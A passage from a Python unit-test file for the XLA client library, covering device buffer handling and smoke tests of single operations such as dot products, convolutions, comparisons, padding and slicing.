    self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
    # OnDeviceSizeInBytes varies depending on the platform. Confirm there's
    # a reasonable value.
    self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
    self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)

  def testLiveBuffers(self):
    if not isinstance(self.backend, xla_client.Client):
      self.skipTest("TPU Driver doesn't support LiveBuffers().")
    self.assertEmpty(self.backend.live_buffers())
    arg0 = np.array([])
    arg1 = np.array([[0., 1., 2.]], np.float32)
    arg2 = np.array([[3., 4., 5.]], bfloat16)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    arg2_buffer = self.backend.buffer_from_pyval(arg2)
    # live_buffers() is expected to list most-recently-created first.
    self.assertLen(self.backend.live_buffers(), 3)
    self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
    self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
    self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
    self.assertEqual(self.backend.devices()[0].live_buffers(),
                     self.backend.live_buffers())
    arg1_buffer.delete()
    self.assertLen(self.backend.live_buffers(), 2)
    self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
    self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
    arg0_buffer.delete()
    arg2_buffer.delete()
    self.assertEmpty(self.backend.live_buffers())

  def testCopyToHost(self):
    arg0 = np.array([[1., 2.]], np.float32)
    arg1 = np.array([[3., 4.]], np.float32)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    # Prefetch two buffers using copy_to_host_async, and then retrieve their
    # values using to_py.
    arg0_buffer.copy_to_host_async()
    arg0_buffer.copy_to_host_async()  # Duplicate calls don't do anything.
    arg1_buffer.copy_to_host_async()
    np.testing.assert_equal(arg0, arg0_buffer.to_py())
    np.testing.assert_equal(arg1, arg1_buffer.to_py())
    # copy_to_host_async does nothing after to_py is called.
    arg0_buffer.copy_to_host_async()
    np.testing.assert_equal(arg0, arg0_buffer.to_py())

  def testDevice(self):
    x = np.arange(8, dtype=np.int32)
    for device in self.backend.local_devices():
      buf = self.backend.buffer_from_pyval(x, device=device)
      self.assertEqual(buf.device(), device)
      np.testing.assert_equal(x, buf.to_py())

  def testStandardTypes(self):
    for dtype in standard_dtypes:
      # bfloat16 and complex128 are excluded from this exact-scalar-type
      # round-trip check.
      if dtype == bfloat16 or dtype == np.complex128:
        continue
      arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
      arr = arr.to_py()
      self.assertEqual(dtype, type(arr[0]))

  def testUnsafeBufferPointer(self):
    if not isinstance(self.backend, xla_client.Client):
      self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
    arg0 = np.array([])
    arg1 = np.array([[0., 1., 2.]], np.float32)
    arg2 = np.array([[3., 4., 5.]], bfloat16)
    arg0_buffer = self.backend.buffer_from_pyval(arg0)
    arg1_buffer = self.backend.buffer_from_pyval(arg1)
    arg2_buffer = self.backend.buffer_from_pyval(arg2)
    self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
    self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
    self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testClone(self):
    x = np.array([[3., 4., 5.]], np.float32)
    y = self.backend.buffer_from_pyval(x)
    z = y.clone()
    # NOTE(review): this compares the numpy array with the buffer, which are
    # trivially distinct objects; the intent was presumably id(y) vs id(z).
    # Kept as-is to preserve behavior.
    self.assertNotEqual(id(x), id(y))
    np.testing.assert_array_equal(y.to_py(), z.to_py())
    # A clone is expected to alias the same device memory as the original.
    self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())

  @unittest.skipIf(cloud_tpu, "not implemented")
  def testJaxAttributesHaveCorrectDefaults(self):
    x = np.array([[3., 4., 5.]], np.float32)
    y = self.backend.buffer_from_pyval(x)
    self.assertIsNone(y.aval)
    self.assertIsNone(y._device)
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
# Concatenating two 3-vectors along dimension 0 yields a 6-vector.
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool_, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
# ConvertElementType is a value-preserving cast, checked against
# np.array(x, dtype=dst_dtype) over all ordered dtype pairs.
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
# BitcastConvertType reinterprets the underlying bits (like
# np.ndarray.view), checked between same-width int/float pairs.
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
# With a single replica, AllToAll should act as an identity. Disabled
# until AllToAll is implemented on CPU; only the first sample is used.
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
  """CrossReplicaSum over a single replica is the identity."""
  inputs = (
      NumpyArrayF32(42.0),
      NumpyArrayF32([97.0]),
      NumpyArrayF32([64.0, 117.0]),
      NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
  )
  for operand in inputs:
    c = self._NewComputation()
    ops.CrossReplicaSum(ops.Constant(c, operand))
    self._ExecuteAndCompareExact(c, expected=[operand])
def testReplicaId(self):
  """With a single replica, ReplicaId evaluates to 0."""
  builder = self._NewComputation()
  _ = ops.ReplicaId(builder)
  self._ExecuteAndCompareExact(builder, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
  """CrossReplicaSum with the explicit replica group [[0]] is the identity."""
  inputs = (
      NumpyArrayF32(42.0),
      NumpyArrayF32([97.0]),
      NumpyArrayF32([64.0, 117.0]),
      NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
  )
  for operand in inputs:
    c = self._NewComputation()
    ops.CrossReplicaSum(
        ops.Constant(c, operand), xla_client.make_replica_groups([[0]]))
    self._ExecuteAndCompareExact(c, expected=[operand])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
# (2, 2) . (2, 1) checked against np.dot.
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
  # TODO(phawkins): np.dot implementation doesn't support bfloat16
  @parameterized.named_parameters({
      "testcase_name": "_{}".format(dtype.__name__),
      "dtype": dtype,
  } for dtype in float_dtypes if dtype != bfloat16)
  def testDotMatrixMatrix(self, dtype):
    """Dot of two 2x2 matrices matches np.dot."""
    c = self._NewComputation()
    lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
    rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
    ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
    self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
  def testConvGeneralDilatedF32(self):
    """ConvGeneralDilated with LHS dilation and asymmetric padding (NCHW)."""
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 1, 2, 3)
    rhs = a(1, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NCHW", "OIHW", "NCHW"), 2)
    ops.ConvGeneralDilated(
        ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
        lhs_dilation, rhs_dilation, dimension_numbers)
    # Golden output for the fixed inputs above.
    result = np.array([[[
        [0., 0., 0.],
        [10., 20., 0.],
        [0., 0., 0.],
        [40., 50., 0.],
    ]]])
    self._ExecuteAndCompareClose(c, expected=[result])
  def testConvGeneralDilatedF32WithPrecisionConfig(self):
    """Same convolution as testConvGeneralDilatedF32 plus a PrecisionConfig."""
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 1, 2, 3)
    rhs = a(1, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NCHW", "OIHW", "NCHW"), 2)
    config = xla_client.PrecisionConfig()
    config.operand_precision.append(config.Precision.HIGHEST)
    config.operand_precision.append(config.Precision.DEFAULT)
    ops.ConvGeneralDilated(
        ops.Constant(c, lhs),
        ops.Constant(c, rhs),
        strides,
        pads,
        lhs_dilation,
        rhs_dilation,
        dimension_numbers,
        precision_config=config)
    # Golden output; precision config must not change the result here.
    result = np.array([[[
        [0., 0., 0.],
        [10., 20., 0.],
        [0., 0., 0.],
        [40., 50., 0.],
    ]]])
    self._ExecuteAndCompareClose(c, expected=[result])
  def testConvGeneralDilatedPermutedF32(self):
    """Same convolution, but with permuted NHWC input / CWNH output layouts."""
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 1, 2, 3)
    rhs = a(1, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NHWC", "OIHW", "CWNH"), 2)
    # Input is transposed NCHW -> NHWC; expected output is transposed to CWNH.
    ops.ConvGeneralDilated(
        ops.Constant(c, np.transpose(lhs,
                                     (0, 2, 3, 1))), ops.Constant(c, rhs),
        strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
    result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
                         [40., 50., 0.]]]])
    self._ExecuteAndCompareClose(
        c, expected=[np.transpose(result, (1, 3, 0, 2))])
  def testConvGeneralDilatedGroupedConvolutionF32(self):
    """Grouped convolution (feature_group_count=2) with LHS dilation."""
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 2, 2, 3)
    rhs = a(2, 1, 1, 2) * 10
    strides = [1, 1]
    pads = [(1, 0), (0, 1)]
    lhs_dilation = (2, 1)
    rhs_dilation = (1, 1)
    dimension_numbers = xla_client.make_convolution_dimension_numbers(
        ("NCHW", "OIHW", "NCHW"), 2)
    # Two groups: each input channel convolves with its own filter.
    feature_group_count = 2
    ops.ConvGeneralDilated(
        ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
        lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
    result = np.array([[[
        [0., 0., 0.],
        [10., 20., 0.],
        [0., 0., 0.],
        [40., 50., 0.],
    ], [
        [0., 0., 0.],
        [330., 380., 160.],
        [0., 0., 0.],
        [480., 530., 220.],
    ]]])
    self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
  def testTranspose(self):
    """Transpose matches np.transpose for several shapes and permutations."""
    def _TransposeAndTest(array, permutation):
      # Helper: compile a single Transpose and compare against numpy.
      c = self._NewComputation()
      ops.Transpose(ops.Constant(c, array), permutation)
      expected = np.transpose(array, permutation)
      self._ExecuteAndCompareClose(c, expected=[expected])
    _TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
    _TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
    _TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
    _TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
    arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
    # Exercise both C-ordered and Fortran-ordered layouts.
    for permutation in itertools.permutations(range(arr.ndim)):
      _TransposeAndTest(arr, permutation)
      _TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
  def testNe(self):
    """Elementwise Ne for ints, then for floats including NaN and -0.0."""
    c = self._NewComputation()
    ops.Ne(
        ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
        ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
    self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
    # Reuses the same builder: this Ne becomes the root when rebuilt below.
    # NaN != anything (even NaN) is True; 0.0 == -0.0 so Ne is False.
    ops.Ne(
        ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
                                       float("nan"),
                                       float("nan")])),
        ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
                                       float("nan")])))
    self._ExecuteAndAssertWith(
        np.testing.assert_allclose,
        c, (),
        expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
  def testPadWithPaddingConfig(self):
    """Pad with a hand-populated PaddingConfig proto gives the same result."""
    c = self._NewComputation()
    padding_config = xla_client.PaddingConfig()
    # Build one PaddingConfigDimension per axis: (low, high, interior).
    for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
      dimension = xla_client.PaddingConfigDimension()
      dimension.edge_padding_low = lo
      dimension.edge_padding_high = hi
      dimension.interior_padding = interior
      padding_config.dimensions.append(dimension)
    ops.Pad(
        ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
        ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
    self._ExecuteAndCompareClose(
        c,
        expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
                   [3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
  def testSliceInDim(self):
    """SliceInDim along dim 1, then (rebuilding the same computation) dim 0."""
    c = self._NewComputation()
    ops.SliceInDim(
        ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        start_index=1,
        limit_index=2,
        stride=1,
        dimno=1)
    self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
    # Reuses the builder: the second SliceInDim becomes the root on rebuild.
    ops.SliceInDim(
        ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        start_index=0,
        limit_index=3,
        stride=2,
        dimno=0)
    self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
  def testTuple(self):
    """Tuple of (int32, f32 vector, bool vector) round-trips all elements."""
    c = self._NewComputation()
    ops.Tuple(c, [
        ops.Constant(c, np.int32(42)),
        ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
        ops.Constant(c, NumpyArrayBool([True, False, False, True]))
    ])
    result = xla_client.execute_with_python_values(
        self.backend.compile(c.build()), (), backend=self.backend)
    # A tuple result is flattened into one python value per element.
    self.assertLen(result, 3)
    np.testing.assert_equal(result[0], 42)
    np.testing.assert_allclose(result[1], [1.0, 2.0])
    np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
  def testBroadcastInDim(self):
    """BroadcastInDim maps a vector to rows or columns of a 2x2 result."""
    c = self._NewComputation()
    ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
    self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
    # Reuses the builder; the second op becomes the root on rebuild.
    ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
    self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
  def testRngNormal(self):
    """RngNormal(0, 1) produces the requested shape with distinct values."""
    shape = (2, 3)
    c = self._NewComputation()
    ops.RngNormal(
        ops.Constant(c, NumpyArrayF32(0.)),
        ops.Constant(c, NumpyArrayF32(1.)),
